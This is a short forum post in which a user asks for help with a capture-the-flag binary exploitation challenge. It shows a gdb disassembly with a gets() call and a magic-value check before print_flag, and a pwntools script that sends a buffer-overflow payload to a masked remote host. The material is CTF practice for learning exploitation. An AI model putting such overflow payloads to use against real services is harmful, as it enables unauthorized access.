Jump to content

inspectorderick

Members
  • Posts

    1
  • Joined

  • Last visited

Everything posted by inspectorderick

  1. Hello i've a problem to solve, a binary exploitation this is my output gdb 0x004008a6 <+301>: lea eax,[ebp-0x3b]0x004008a9 <+304>: push eax0x004008aa <+305>: call 0x400520 <gets@plt>0x004008af <+310>: add esp,0x100x004008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c80x004008b9 <+320>: jne 0x4008c2 <main+329>0x004008bb <+322>: call 0x4006fd <print_flag>0x004008c0 <+327>: jmp 0x4008d4 <main+347> this is my program in python from pwn import *r = remote("***************.com", 4321)payload = "A"*i + "\xc8\x10\xa1\xde"r.send("Sir Lancelot of Camelot\n")print r.recv(4096)r.send("To seek the Holy Grail.\n")print r.recv(4096)r.send(payload)print r.recv(4096) My goal is to jump the comparaison to access the function witch print the flag some advise or help are welcome thanks
×
×
  • Create New...